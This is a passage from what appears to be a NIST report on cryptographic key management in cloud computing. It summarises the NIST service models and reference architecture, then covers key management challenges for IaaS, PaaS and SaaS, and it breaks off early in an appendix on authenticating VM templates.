functionality via the Internet, enterprise -level applications, web -based retail services, document -
sharing capabilities  and fully-hosted IT platforms, to mention only a few cloud computing use 
cases of the 2000s.  The latest widespread adoption of virtualization and of service -oriented 
architecture (SOA) promulgated cloud computing as a fundamental and increasingly important 
part of any delivery and critical -mission strategy, enabling existing and new products and 
services to be offered and consumed more efficiently, conveniently and securely. Not 
surprisingly, cloud computing became one of the hottest trends in the IT armory, with a unique 
and complementary set of properties , such as elasticity, resiliency, rapid  provisioning, and multi -
tenancy.  
2.2 Cloud Computing Definition  (by NIST)  
Cloud computing is a model for enabling convenient, on- demand network access to a shared 
pool of configurable resources (e.g., networks, servers, storage, applications, and services ) that 
can be rapidly provisioned and released with minimal management efforts or service provider  
 
9 
 interaction. Enterprises can use these resources to develop , host , and run services and 
applications on demand in a flexible manner in any devices, anytime, and anywhere. According 
to the U.S. National Institute of Standards and Technology’s (NIST) definition published in the 
NIST Special Publication SP 800- 145, "cloud computing is a model for enabling ubiquitous, 
convenient, on- demand network access to a shar ed pool of configurable computing resources 
(e.g., networks, servers, storage, applications and services) that can be rapidly provisioned and 
released with minimal management effort or service provider interaction." This definition is 
widely accepted as a valuable contribution toward providing a clear understanding of cloud 
computing technologies and cloud services and it has been submitted as the U.S. contribution for 
an International standardization1.  
The NIST definition also provides a unifying view of five essential characteristics that all cloud 
services exhibit: on- demand self -service, broad network access, resource pooling, rapid 
elasticity, and  measured service. Furthermore, NIST identifies a simple and unambiguous 
taxonomy of three “service models”  available to cloud Consumer s (Infrastructure -as-a-Service 
(IaaS) , Platform -as-a Service (PaaS ), Software -as-a-Service (SaaS )) and four "cloud deployment 
modes" (Public, Private, Community , and Hybrid) that together categorize ways to deliver cloud 
services. Since the cloud service model is an important architectural factor when discussing key 
managements aspects in a cloud environment, we are reproducing below the definitions for the service models provided by NIST in SP 800- 145, “The NIST definition of Cloud Computing”:  
1. Infrastructure as a Service (IaaS) -  The capability provided to the Consumer  is to provision 
processing, storage, networks, and other fundamental computing resources where the Consumer  
is able to deploy and run arbitrary software, which can include operating systems and 
applications. The Consumer  does not manage or control the und erlying cloud infrastructure , but 
has control over operating systems, storage, deployed applications, and possibly limited control of select networking components (e.g., host firewal ls).  
2. Platform as a Service (PaaS) -  The capability provided to the Consum er is to deploy Consumer -
created or acquired applications onto the cloud infrastructure that are created using programming languages and tools supported by the Provider . The Consumer  does not manage or 
control the underlying cloud infrastructure , including network, servers, operating systems, or 
storage, but has control over the deployed applications and possibly the application- hosting 
environment configurations.  
3.  Software as a Service (SaaS) -  The capability provided to the Consumer  is to use th e Provider ’s 
applications running on a cloud infrastructure. The applications are accessible from various 
client devices through a thin client interface, such as a web browser (e.g., web- based email). The 
Consumer  does not manage or control the underlying cloud infrastructure , including network, 
servers, operating systems, storage, or even individual application capabilities, with the possible 
exception of limited user -specific application- configuration settin gs. 
IaaS allows cloud Consumer s to run any opera ting systems and applications of their c hoice  on 
the hardware and resource abstraction layer ( hypervisors ) furnishe d by the cloud Provider . A 
                                                           
1 http://www.nist.gov/itl/csd/cloud -102511.cfm   
 
10 
 Consumer’s operating systems and applications can be migrated to  the cloud Provider ’s 
hardware, potentially replacing a company’s data center infrastructure.  
PaaS allows Consumer s to create their own cloud applications. Basically, the cloud Provider  
renders  a virtualized  environment and a set of tools to allow the creation of new web 
applications.   The Cloud Provider  also furnishes the hardware, operating systems and commonly 
used system software and applications , such as DBMS, Web Server, etc.  
SaaS allows cloud Consumer s to run online applications. Off -the-shelf applications are accessed 
over the Internet. The cloud Provider  owns the applications , and the Consumer s are authorized to 
use them i n accordance with a Service A greement signed between parties.  
Cloud computing provides a convenient, on- demand way to access a shared pool of configurable 
resources (e.g., networ ks, servers, storage, applications, and services) , which enables  users  to 
develop, host  and run services and applications on demand in a flexible manner  in any devices, 
anytime, and anywhere. Cloud services are those services that  are expressed, delivered and 
consumed over a public  network, a private network or in some combination (community or 
hybrid) . These services are usually delivered in one of the following service categories  identified 
by NIST : IaaS, PaaS and SaaS . Cloud Provider and Broker may also identify other Categories of 
services (such as Network -as-a-Service, Storage- as-a-Service, carrier -as-a-Service) that are 
practical components already embedded in the service models identified by NIST, and are not 
stand -alone service models that identify particular cloud architectures. Some  cloud Provider s 
might  provide abstracted hardware and software resources that may be offered  as a service. This 
allows customers and partners to develop and deploy new applications that  can be configured 
and used remotely. Leveraging cloud services  that provide opportunities to provision resources 
elastically enables enterprises to launch or change their business quickly and easily as need ed.   
2.3 Cloud Computing Reference Architecture  (fro m NIST)  
In the Special Publication SP 500- 292, NIST has published the NIST Cloud Computing 
Reference Architecture2 (RA). This architecture is a logical extension of the NIST cloud 
computing definition. It is a generic high- level conceptual model that is an  effective tool for 
discussing the requirements, structures, and operations of cloud computing. The model is not tied 
to any specific vendor products, services or reference implementation, nor does it provide 
prescriptive solutions . The RA defines a set of  cloud Actors and their activities and functions that 
can be used in the process of orchestrating a cloud Ecos ystem. The Cloud Computing RA relates 
to a companion cloud computing taxonomy and contains a set of views and descriptions that are the basis for discussing the characteristics, uses and standards for cloud computing. The Act or-
based model is intended to serve the expectations of the stakeholders by allowing them to 
                                                           
2 http://collaborate.nist.gov/twiki -cloud -
computing/pub/CloudComputing/ReferenceArchitectureTaxonomy/NIST_SP_500 -292_ -_090611.pdf   
 
11 
 understand the overall view of roles and responsibilities in order to assess and manage the risk by 
implementing adequate security controls.  
The NIST Reference Architecture is intended to facilitate the understanding of the operational 
intricacies in cloud computing. It does not represent the system architecture of a specific cloud 
comput ing system; instead , it is a tool for describing, discussing, and developing a system -
specific architecture using a common framework of reference.  
As shown in Figure 2  this architecture outlines the five major cloud Actors; Consumer , Provider , 
Broker, Carrier and Auditor. 
 
Figure 2 NIST Cloud Computing Security Reference Architecture Approach  (courtesy of NIST, SP 500- 292)  
Each cloud Actor defined by the NIST RA is an entity (a person or an organization) that  
participates in a transaction or process and/or performs tasks in cloud computing. The definitions of the cloud Actors introduced by NIST in SP 500- 292, NIST cloud Computing Reference 
Architecture, are reproduced  below in Table 1.  
Actor  Definition  
Cloud Consumer  A person or organization that maintains a business relationship with, and uses 
service from, Cloud Providers . 
Cloud Provider  A person, organization, or entity responsible for making a service available to 
interested parties . 
Cloud Auditor  A party that can conduct independent assessment of cloud services, information 

 
12 
 system operations, performance and security of the cloud implementation.  
Cloud Broker  An entity that manages the use, performance and delivery of cloud services, and 
negotiates  relationships between Cloud Provider s and Cloud Consumer s. 
Cloud Carrier  An intermediary that provides connectivity and transport of cloud services from 
Cloud Providers  to Cloud Consumer s. 
Table 1 Cloud Actor Definitions  (courtesy of NIST, SP 500 -292) 
In our latest work (draft documents and white papers), NIST identifies two types of cloud 
Provider s: 
1. Primary Provider  and 
2. Intermediary Provider,   
and two types of cloud Brokers:  
1. Business Broker and  
2. Technical Broker.  
Figure 3, below, graphically depicts these two types of Providers and the two types of Brokers. It 
is important to note that, in particular, cloud environments where an Intermediary Provider 
partners with a Primary Provider in offering cloud services, the key management functions that fall under the Provider’s responsibilities might need to be divided among the two Providers, depending on the architectural details of the offered cloud service. From the cloud Consumer’s perspective this segregation is not visible.  
A Primary Provider  offers services hosted on an infrastructure that it owns.  It may make these 
services available to Consumer s through a third party (such as a Broker or Intermediary 
Provider ), but the defining characteristic of a Primary Provider  is that it does not obtain the 
source s of its service offerings from other Provider s. 
An Intermediary Provider  has the capability to interact with other cloud Provider s without 
offering visibility or transparency into the Primary Provider (s).  An Intermed iary Provider  uses 
services offered by a Primary Provider  as invisible components of its own service, which it 
presents to the customer as an integrated offering. From a security perspective, all security services and components required of a Primary Provi der are also required of an Intermediary 
Provider . 
A Business Broker only provides business and relationship services, and does not have any 
contact with the cloud Consumer ’s data, operations, or artifacts (e.g., images, volumes, firewalls) 
in the cloud. T he Business Broker  therefore, has no responsibilities in implementing any key 
management functions, regardless of the cloud architecture .  Conversely, a Technical Broker 
does interact with a Consumer ’s assets;  the Technical Broker aggregates services from multiple 
 
13 
 cloud Provider s and adds a layer of technical functionality by addressing single -point -of-entry 
and interoperability issues. 
There are two key defining features of a cloud Technical Broker  that are  distinct from an 
Intermediary Provider:  
1. The abil ity to provide a single consistent interface (for business or technical purposes) to 
multiple differing Provider s, and  
2.  The transparent visibility  that the Broker allows into who is providing the services in the 
background – as opposed to Intermediary Providers that do not offer such transparency.
 
Figure 3: Composite Cloud Ecosystem Security Architecture (Courtesy of NIST)  
Since the Technical Broker allows for this transparent visibility, the Consumer is aware of which 
key management functions are implemented by each Actor. This case is different from the case in which an Intermediary Provider is involved, since the Intermediary Provider is opaque, and 
the Consumer is unaware of how the key management functions are divided, when applicable, 
between the Intermediary Provider and the Primary Provider.  
The NIST RA diagram in Figure 2 also depicts the three service models discus sed earlier: IaaS, 
PaaS  and SaaS  in the ‘inverted L” representations, highlighting the stackable approach of 
building a cloud service . Additionally, the NIST RA diagram identifies, for each cloud Actor, 
their general activities in a cloud ecosystem. This R eference Architecture is intended to facilitate 
the understanding of the operational intricacies in cloud computing. It does not represent the 
system architecture of a specific cloud computing system; instead , it is a tool for describing, 
discussing, and developing a system -specific architecture using a common framework of 

 
14 
 reference that we plan to leverage in our later discussion of key management issues in a cloud 
environment. 
Cloud computing provide s enterprises with significant  cost savings , both in terms of capital 
expenses (CAPEX) and operational expenses (OPEX) , and allows them to  leverage leading -edge 
technologies to meet the ir information processing needs . In a cloud environment, s ecurity and 
privacy are a cross -cutting concern for all c loud Actors, since both touch upon all layers of the 
cloud computing Reference A rchitecture and impact  many parts of a cloud service. Therefore, 
the security management of the resources associated with  cloud services is a critical aspect of 
cloud computing. In a cloud environment, there are security threats  and security requirements  
that differ for different cloud deployment models, and the necessary mitigations against such 
threats and cloud Actor responsibilities for implementing security controls depend upon the 
service model chosen and the service categories  selected . Many of the security threats can be 
mitigated with the application of traditional security processes and mechanisms , while others 
require cloud- specific solutions . Since each layer of the cloud computing Reference A rchitecture 
may have different security vulnerabilities and may be exposed to different threats, the 
architecture of a cloud -enable d service directly impacts its security posture and the system’s key 
management aspects . 
For each service model,  Figure 4  below uses a building- block approach to depict a graphical 
representation of the cloud Consumer’s visibility and accessibility to the “Security and Integration” layer that hosts the key management in a cloud environment. As the figure shows, the cloud Consumer has high visibility into the “Security & Integration” layer and has control 
over the key management in a IaaS model,  while the cloud Providers implement only the 
infrastructure -level security functions (which are always opaque to Consumers). The Consumer 
has limited visibility and limited key management control in a PaaS model, since the cloud Provider implements the security functions in all lower layers except the “Applications” layer. 
The cloud Consumer loses the visibility a nd the control in a SaaS model and, in general, all key 
management functions are opaque to the cloud Consumer, since the cloud Provider implements 
all security functions.  
 
15 
  
Figure 4 Cloud Service Models and Data Protection (Courtesy of CIO Research Council [CRC])  
In the following Section, we will discuss, for each service model, the Key Management 
challenges encountered by cloud Actors in different use cases.   
3.  Cryptographic Key Man agement Challenge s in the Cloud  
As stated in Section 2, the secur e management of the resources associated with cloud services is 
a critical aspect of cloud computing . Cryptographic operations form one of the main tasks of 
secure management. Hence, while cl oud services provide ubiquitous computing, elastic 
capabilities and self -configurable resources at lower costs, they also entail performing several 
cryptographic operations (from a cloud Consumer perspective) for the following:  
• Secure Interaction of the Cl oud Consumer with various services and  
• Secure Storage of data generated/processed by those services.  
 
The key management system (KMS) required to support cryptographic operations for the above 
functions can be complex, due to differences in ownership and c ontrol of underlying 
infrastructures on which the KMS and the protected resources are located. For example, though 
the ownership of data in cloud services rests with the cloud Consumer, the data is physically 
resident on storage resources controlled by the  cloud Provider, and in many instances, the KMS 
required for managing the cryptographic keys needed to protect that data have to be run on the computing resources provided by the cloud Provider. This presents challenges to a cloud 
Consumer seeking to obtai n the necessary security assurance from those cryptographic 
operations.  

 
16 
 The driver for the set of cryptographic operations performed in the main cloud service models 
(IaaS, PaaS and SaaS) depends upon the features that constitute those services.  Though there are slight variations in the feature set among different cloud Providers, it is possible to identify a 
core set of features . Based on these core set of features, we identify the security capabilities 
associated with the exercise of the features, and from the state of practices using architectural 
solutions for achieving those security capabilities, we derive the key management challenges for 
IaaS, PaaS and SaaS service types in sections 3.1, 3.2 & 3.3, respectively. It must be noted 
upfront that in al l architectural solutions where cryptographic keys are stored in the cloud, there 
is a limit to the degree of security assurance that the cloud C onsumer can expect to get , due to 
the fact that the logical and physical organization of the storage resources are entirely under the 
control of the  cloud Provider. 
3.1 Challenges in Cryptographic Operations & Key Management for IaaS 
 
In the IaaS cloud type , the Consumer deploys its own comput ing resources in the form of virtual 
machines (VMs) or leases them from the cloud Provider. The leasing option involves checking 
out pre -built images offered by an IaaS cloud Provider. The VM images that are checked out 
must be authenticated to ensure that they are from authorized sources and have not been 
tampered with. After a VM  is configured, it has to be launched in the cloud Provider’s 
infrastructure to become a running VM instance. The operation of launching the VM and the 
subsequent lifecycle operations on the VM (such as Stop, Pause, Restart, Kill etc) are performed by the IaaS cloud Consumer through access to the management interface of the Hypervisor.  
Additionally, during operations or the use of cloud services, the IaaS cloud Consumer has to interact with running VM instances in a secure manner. These three operations – checking out a 
VM, performing lifecycle operations (including launching) on a VM instance and secure 
interaction with it -  are performed by designated service -level administrators of the IaaS cloud 
Consumer.  IaaS cloud service security capabilities (SC)  that enable these operations are:  
• IaaS -SC1: The a bility to authenticate pre -defined VM Image Templates made available 
by a cloud Provider  for building functional, customized VM instances that me et a cloud 
Consumer ’s needs ,  
• IaaS -SC2: The a bility to authenticate the API calls sent by the cloud Consumer  to the 
VM Management interface of the cloud Provider ’s Hypervisor environment , and  
• IaaS -SC3: The a bility to secure the communication while performing administrative 
operations on VM instances  
 For each of the three security capabilities identified above, possible architectural solutions  (AS) 
are presented below that are based on known secure functions or protocols. The cryptographic 
key management  challenges  associated with these AS are also described and discussed . 
 
17 
 IaaS -SC1:  The a bility to authenticate pre -defined VM Image Templates made available by a 
cloud Provider  for building functional, customized VM instances that meet a cloud Consumer ’s 
needs (Server Authentication Mechanism).  
 
Architectural Solution :  
When leasing VMs from IaaS Providers, cl oud Consumer s are concern ed that  the VM image 
templates being checked out  might not be authentic . To mitigate this concern, the templates can  
be digitally signed by the cloud Provider . The pr ivate key of a public/private key pair that is used 
to sign the VM image templates should be securely stored by the Provider  and protected while in 
use (e.g., using FIPS 140 -2 validated cryptographic module). The Provider  need s to make the 
corresponding public key  available to the Consumer  in an authenticated manner (e.g., using an 
out-of-band means or using a public key certificate).  Alternative means of assuring the integrity 
of the VM are: a) the use of a cryptographic  hash function (secure hash function), such as SHA -
256 computed over  the VM code, which Consumer s should re -compute and verify against the 
value obtained  using an out -of-band means ; b) the use of cryptographic message authentication 
code  (MAC) mechanisms (i.e., HMAC or a block -cipher -based MAC) using a cryptographic 
algorithm and a secret shared by the Provider  and the Consumer s.  
 
Key Management Challenges:  
The authentication  of the VM templates using one of the cryptographic technique s referred 
above (i.e., digital signature, cryptographic hash function, or message authentication code) 
entail s the bootstrapping problem  and hence, requires a comprehensive security analysis, rather 
than just an examination of the key management challenge .  Appendix A provides this analysis 
for the three possible cryptographic techniques for achieving IaaS-SC1 and a possible solution.  
 
IaaS -SC2:  The a bility to authenticate the API calls sent by the cloud Consumer  to the VM 
Management interface of the cloud Provider ’s Hypervisor environment .  
 
Architectural Solution :  
Although the responsibility for configuring the VMs lies with a cloud Consumer , an IaaS cloud 
Provider can implement  functionality whereby the VM Management Interface of the Hypervisor 
only a ccepts and executes  authenticated API  calls. Cloud Consumers need to generate or possess 
a public/private key pair that will be used for signing the calls submitted to the VM Management interface. The public key needs to be bound to the Consumer’s identity  in a public key certificate 
signed by a trusted authority. The certificate is then made available to the VM Management Interface of the Hypervisor to verify the signature of the calls submitted by the Consumer to the 
VM instance.  An alternative approach is to provide the capability for the cloud Consumer to set 
up a secure session with the VM Management interface using either SSH (refer IaaS -SC3) or 
TLS (refer IaaS -SC4).  
 
 
18 
 Key Management Challenge:   
Cloud Consumers need to secure the private key  of the  public/private key pair that is used to sign 
the VM Management commands  on their system  (both at rest  and while in use) . 
 
IaaS -SC3:  The a bility to secure the communication while performing administrative operations 
on VM instance s. 
 
Architectural Solution :  
The service- level administrators of the IaaS Consumer  need root /administrator  access to running 
VM instances deployed or leased by th at Consumer . A typical mechanism deployed to secure 
this access is Secure Shell (SSH) that provides a framework for public/ private (asymmetric) keys 
or password- based client authentication technique s. A public/private key technique  requires the 
cloud Consumer  to generate a public/private key pair and then associate the public key with the 
Consumer’s account  in the VM instance.  The task of a VM recognizing the Consumer  as the 
owner of the companion private key is accomplished by appending the public key to the 
authorized keys file in the VM instance that can support SSH login through protocols such as 
File Transfer Protocol (ftp ), Secure Copy Protocol (scp), or console commands. Thus, SSH can 
be used to enable the VM instance to authenticate the Consumer using cryptographic means.  Further details of the SSH protocol are described in Internet RFC 4253.  This strong 
cryptographic authentication prevents anonymous connection attempts to the VM instance , as 
well as prevent ing authentication attacks (such as password guessing). Moreover, t he SSH 
protocol permits asymmetric keys to be used to perform an authenticated ephemeral Diffie -
Hellman (DH) key establishment . The symmetric session key s calculated during this process are 
used to encrypt the payload and to  generat e hash -based message authentication codes, thus 
providing both confidentiality and integrity security services. When SSH is used, not only is the 
administrator authenticated, but all the commands, responses, and payload are protected  in both 
directions ( Consumer  
 VM)  from eavesdropping and against undetected modifications, and 
are cryptographically authenticated .  
 
Key Man agement Challenges:  
Cloud Consumers need to secure the private key  of the  public/private key pair that is used to 
authenticate themselves,  using the best enterprise security mechanism s. It is important to note 
that,  the Diffie -Hellman keys and the derived session keys are ephemeral and generated or 
calculated on -the-fly.  Thus, these keys do not require persistent storage , and hence, their key 
management is not an issue.   
After the service -level administrator of the cloud Consumer authenticates  pre-defined VM 
Images provided by the cloud Provider and checks them out (using capability IaaS -SC1), 
customizes them to its requirements, launches them securely in the hypervisor environment 
(using IaaS -SC2) of the cloud Provider and performs configurati on maintenance through secure 
interaction with the launched VM instances (using capability IaaS -SC3), the application- level 
 
19 
 administrator of the cloud Consumer installs and configures various servers (web servers, 
Database Management servers, etc.), applic ation execution environments ( e.g., Java VMs  and 
Java run time modules) and application executables  (and in some instances, source codes, as 
well) on those VM instances. Although the application- level administrators do not configure VM 
instances (such as allocation/resizing of virtual memory, CPU cores , or virtual disks), they need 
to setup secure sessions with VM instances prior to being authenticated. Hence, in most practical 
situations, the same service -level administrators of the cloud Consumer play the role of 
application -level administrators as we ll.  The administrators use the same SSH technique and 
keys for secure application- level administration.  
 After applications are up and running on their leased VMs, the application users of an IaaS cloud 
Consumer would like to interact with these applications securely (through setting up secure 
sessions and strong authentication) and exercise the various application features – depending upon the set of assigned permissions or by assuming their assigned roles (which provide the permissions). Finally, there i s the need for Data Storage services for all categories (service- level 
administrators, application -level administrators and application users) of IaaS Consumers.  The 
data storage services required may span different types of data, such as:  (a) Static Dat a – 
application s’ source code, Reference data used by applications, Archived data and Logs, and (b) 
Application data – generated and used by applications. The application data in turn could be 
either Structured (e.g., Database data) or Unstructured (e.g., files from social feeds).  
 
The challenges in the secure interaction of the application users (as opposed to application- level 
administrators) of IaaS cloud Consumers with IaaS cloud services (both main services, such as executing the applications on VM ins tances, as well as auxiliary services such as data storage) 
are: 
 
• IaaS-SC4: The a bility to secure the communication with  application instances running on 
VM instances for application users during cloud- service usage,  
• IaaS-SC5: The a bility to securely store static application support data securely   (data not 
directly processed by applications),  
• IaaS-SC6: The a bility to securely store application data in a structured form  (e.g., 
relational form)  securely using a Database Management System (DBMS),  and 
• IaaS-SC7 The a bility to securely store application data that is unstructured  
IaaS -SC4: The a bility to secure the communication with application instances running 
on VM instances for application users during cloud service usage . 
 
Architectural Solution :  
Application users (clients) generally interact with services by setting up a secure session (which can provide both confidentiality and integrity) with application ( service)  instances (e.g., Web 
 
20 
 server or DBMS server instances). The most common technology employed is the Transport 
Layer Security (TLS) protocol.  TLS , just like SSH described earlier , can be used to enable the 
service instance and client to authenticate each other using a cryptographic means (as described 
in Internet RFC 5246) , as well as to set up secure session keys for encrypting/decrypting and for 
generating message authentication codes.  
 
Key Management Challenges:   
The secure session requires the presence of an asymmetric key pair (private and public keys) for 
a service instance and an op tional key pair on the client side , as well.  The client -side private key 
can be managed by an enterprise key management system , and the server -side private key has to 
be managed by a key management system run by the IaaS cloud Provider . 
 
IaaS -SC5: The a bility to securely store static  application support  data securely .   
 
Architectural Solution:   
To support applications running on leased VM instances, IaaS cloud Consumer s need   
secure storage services to store relatively static  data such as a pplication s’ source code,  
reference data used by  applications, preferred VM Images , and archived d ata and Logs. These  
types of data are  different from data generated, processed , and stored directly by the  
application. To store the former type of data, the cloud Provider s offer a file -storage service.  
 
Key Management Challenge :   
The data that is not processed by or written to by applications can be encrypted at  the cloud 
Consumer  site before being uploaded to the  cloud Provider s file storage service. Hence, 
encryption keys (generally , symmetric keys)  needed for encrypting the data at the cloud 
Consumer site and are under its administrative control and can thus be secured using enterprise key management solutions. 
 
IaaS -SC6: The a bility to securely store application data in a structured form securely : To store 
structured data generated by applications running on its VM instances, the IaaS cloud Consumer  
needs to subscribe to a Database service ( generally a relational service offered by the Provider  as 
an adjunct to its IaaS offering).  The cloud Consumer  subscribing to this service is generally 
provided with a  DBMS instance with the ability to custom configure the instance to suit its 
business and security needs . The options available to provide confidentia lity protection for data 
managed by the DBMS instance and the associated key management challenge are described below:  
 
Architectural Solution -TDE: (Transparent/External Encryption):  
Use the native encryption function that is provided as a feature within the DBMS engine or use a third party tool. This feature is called Transparent Data Encryption (TDE) and is a technique 
 
21 
 similar to storage -level encryption (the encryption engine operat es at the I/O level and encrypts 
data just prior to being written to disk). The whole database is protected with a single Database 
Encryption Key (DEK) that is itself protected by more complex means, including the possibility 
of using a Hardware Security M odule (HSM). Since TDE performs all cryptographic operation at 
the I/O level within the database system, there is no need to modify the application logic or the 
database schema.  
 
Key Management Challenge :  
Since the IaaS cloud Consumer  has administrative control of the subscribed DBMS          
instance, it has control over the DEK as well. Since encryption is taking place at the I/O level, the DEK has to reside close to the storage resources designated for storage of the database data, 
and hence, the cloud Consumer has no option other than storing the DEK in the same cloud 
where the DBMS instance is running. Although there are TDE implementations that offer 
column and table -level granularity for encryption, the most common usage is for st orage -level 
encryption, and hence, the implementation  cannot be configured to provide different encryption 
keys to different users  based on their permission set  (or assigned role ). 
 
Architectural Solution - ULE : (Database level encryption or user- level encryption)  
Under this feature, users  can choose to encrypt data at the column level, table level or  even a set 
of data files corresponding to multiple tables or indexes.  
 
Key Management Challenge:    
This solution r equires the use of a different encryption key for different database objects. A n 
additional service is required (e.g., by a Security Server) that will map the set of session 
permissions of the user (based on the roles assumed) to the set of keys , and then make a call to a 
KMS to retrieve the required set of keys from key storage.  For better security, the security server, the KMS , and (persistent)  key storage should be run in a cloud that is different from  the 
DBMS instance or should be run on- premise by  the cloud Consumer.  The security server and 
KMS perform the role -to-key mapping and key retrieval functions , respectively , based on the 
authenticated credentials of the DBMS user.  However, during a user's session (for key usage), the keys remain in a cache of the memory space created for the user session in the same cloud as 
the DBMS instance.  The added challenge of retrieving the key from the KMS and providing it 
securely to the application running in the cloud Provider space also needs to be dealt with.  One 
can argue that o nce the secure session with the DBMS application in the cloud is established, this 
security challenge is trivial.  Alternatively, the cloud Consumer can run the security server and the KMS in the same cloud as the DBMS application.  This latter approach le aves the sensitive 
data vulnerable to access by the cloud Provider Administrators unless additional security measures are taken.  
 
 
22 
 IaaS -SC7: The a bility to store unstructured application data securely : This operation requires 
storage -level encryption similar to Transparent/External encryption (Architectural Solution -1: 
(Transparent/External Encryption ), and hence, the same key management challenges apply.  
3.2 Challenges in Cryptographic Operations and Key M anagement for PaaS  
 
The objective of a Platform as a Service (PaaS)  offering is to provide a computational platform 
and the necessary set of application development tools to Consumers for developing or deploying applications. Although the underlying OS pla tform on which the development tools 
are hosted is known to the Consumer, the Consumer does not have control over its configuration functions and thus the resulting operating environment. Consumers interact with these tools (and associated data, such as development libraries) to develop custom applications. Consumers may also need a storage infrastructure to store both supporting data and application data for testing the application functionality. PaaS cloud service security  capabilities  (SC) that enable these 
operations are:  
 
• PaaS-SC1: The a bility to set up secure interaction with deployed applications and/or 
development tool instances , 
• PaaS-SC2: The a bility to securely store static data   (data not directly processed by 
applications),  
• PaaS-SC3: The a bility to securely store application data in a structured form  (e.g., 
relational form ) using a Database Management System  (DBMS), and  
• PaaS-SC4: The a bility to securely store application data that is unstructured. 
 
The operations involved in exercising the above capabilities (PaaS -SC1 through PaaS -SC4) are 
identical to the operations involved in exercising capabilities IaaS -SC4 through IaaS -SC7, 
respectively . Therefore , the same cryptographic key management challenges apply.  
 
3.3 Challenges in Cry ptographic Operations & Key Management for SaaS  
 
SaaS offerings provide access to applications hosted by the cloud Provider.  An SaaS cloud Consumer would like to interact with these application instances securely (through setting up secure sessions and st rong authentication) and exercise the various application features, 
depending upon the set of assigned permissions or by assuming their assigned roles (which provide the permissions).  In addition, some SaaS Consumers would also like to store the data gene rated/processed by those applications in an encrypted form for the following reasons: (a) to 
prevent exposure of their corporate data, due to loss of the media used by cloud Providers; (b) 
surreptitious viewing of their data by an SaaS co- tenant or by a cl oud Provider administrator. 
Though the former feature (secure interaction with application) is provided by the SaaS 
Providers, the second feature (storing data in an encrypted form) currently has to be provided 
 
23 
 entirely by the SaaS Consumer. The typical set of security capabilities (whether provided by an 
SaaS service or not) are:  
 
• SaaS-SC1: The a bility to set up secure interaction with  an application, and  
• SaaS-SC2: The a bility to store application data (structured or unstructured) in an 
encrypted form . 
 The operations involved in exercising the SaaS -SC1 capability are  identical to the operations 
involved in exercising the IaaS -SC4 capability . Therefore , the same cryptographic key 
management challenges apply.   
 
SaaS -SC2: The a bility to store application data  (structured or unstructured) in an encrypted 
form . 
There are two operational scenarios here. If all fields in the database need to be encrypted, then the encryption capabilities have to reside with the cloud Provider because of the sheer scale of 
operat ion (see Architectural Solution – DVE below for description). On the other hand, if each 
cloud Consumer wants selective encryption of a  subset of fields,  and since this  subset varies 
with each Customer, all encryption operations ha ve to take place at the client (cloud Consumer) 
end (see Architectural Solution – GTE). The key management challenges for each of the two options are discussed below after a brief description of the associated architectural solution.  
 
Architectural Solution -DVE (Encryption of Entire Database) : 
For efficient encryption and storage of application data, SaaS cloud Providers divide the physical 
storage resources into logical storage chunks called disk volumes  and assign different 
encryption keys over sets of di sk volumes (e.g., assign an encryption key for two or three disk 
volumes).  
 
Key Management Challenge : 
Since all the encryption keys are under the control of the SaaS cloud Provider, this architectural solution does not provide assurance to the Consumer against the insider
3 threat unless additional 
measures are taken.  Also , it is possible that data belonging to different Consumers reside on a 
single disk volume and is protected by a common encryption key, providing no cryptographic 
separation of the data belonging to different cloud Consumers.  Furthermore, the sheer volume of 
data stored in large SaaS cloud offerings requires a large number of keys, thus necessitating the 
need for the management of hundreds of symmetric encryption keys, possibly using multiple key management servers.  If the key management function is carried out using an HSM, then it may 
require the creation and maintenance of multiple HSM partitions.  
 
                                                           
3 That is, cloud Provider Administrator  
 
24 
 Architectural Solution -GTE (Selective Encryption of Database fields) :  
For selective encryption of certain set of fields chosen by the Consumer (the selection of the set 
based on each Consumer's business requirements), an encryption gateway (generally running as 
an appliance) is usually employed inside the cloud Consumer's enterprise networ k. 
Architecturally, the gateway is located between the SaaS client application and SaaS cloud 
application (hosted by cloud SaaS Provider) and acts as a reverse proxy server that monitors all incoming and outgoing application traffic (e.g., HTTP, SMTP, SOAP  and REST). The outgoing 
payload in this context will usually be the data that needs to be sent to the SaaS cloud application for storage. The gateway being configured with rules for encrypting different data items, encrypts or tokenizes the data in real t ime and forwards the modified data to the SaaS cloud 
application. Similarly, encrypted or tokenized data retrieved and returned by the SaaS cloud 
application is converted again, in real time, into clear text prior to being displayed by the SaaS 
client appl ication. This encryption scheme thus requires no change either to the SaaS cloud 
Provider application or to the SaaS cloud Consumer's client application.  Furthermore, all application functionality can be exercised normally since the encryption/decryption process 
performed by the encryption gateway is Format and Function- Preserving. Thus, the encryption 
gateway is the solution adopted under the following scenario:  
• The SaaS cloud Consumer needs selective encryption of certain fields and hence all the 
process ing (from the application functionality point of view) as well as encryption of 
those fields occurs at the Consumer side and the DBMS instance at the cloud is used just 
for storage (as opposed to computational processing) as far as those fields are concerned.  
• The values in fields marked for encryption thus are in encrypted form at all times in the 
cloud (both during application processing in the cloud and storage in the cloud)  
• Data in clear text is visible only to authorized clients using SaaS client applic ation to 
interact with the SaaS cloud application through the encryption gateway  
 
Key Management Challenge : 
The encryption gateway may use a single key  or different cryptographic keys for 
encrypting/decrypting different selected fields of the application. Irrespective of the number of 
cryptographic keys used, since the encryption gateway resides within the enterprise network 
perimeter, all cryptographic keys are fully under the control of the SaaS  cloud Consumer  and, as 
such, protected using in- house enterp rise key management  policies and practices.   
 
 
25 
 Appendix A  – Security Analysis of Cryptographic Techniques for 
Authenticating VM Templates in the Cloud  
 
When leasing VMs from cloud Providers, cloud Consumers are concern ed that  the VM templates 
being checked out  might not be authentic . To mitigate this concern, the following are some 
possible techniques:  
1. A Digital Signature on the VM template,  
2. The use of a Cryptographic Hash function,  
3. The use of a Keyed Message Authentication Code, or  
4. The use of cloud Provider Environment Discretionary Access Control.  
 
Each of these techniques is described and analyzed below.  Note that there are numerous 
variations for each technique and several other techniques, but these techniques were chosen to illustrate how to go  about performing security analysis.  Also note that, based on the cloud 
computing paradigm, it is assumed that the cloud Consumer will not download the VM template 
for authentication in the Consumer’s Enterprise environment.  Rather, the authentication wi ll be 
performed in the Provider environment in which the VM is going to execute. 
A.1. VM Template  Authentication using Digital Signature  
As Figure A -1, illustrates, the cloud Provider signs the VM template  using the cloud Provider ’s 
private key once the V M template  has been created.  The signing function needs  to be performed 
only once when the VM template is created.  
Every time that a cloud Consumer checks out a VM template, he /she can verify the digital 
signature on the VM template using the public key of the cloud Provider.  The cloud Consumer 
supplies the public key to the verification engine as illustrated in Figure A -1. 
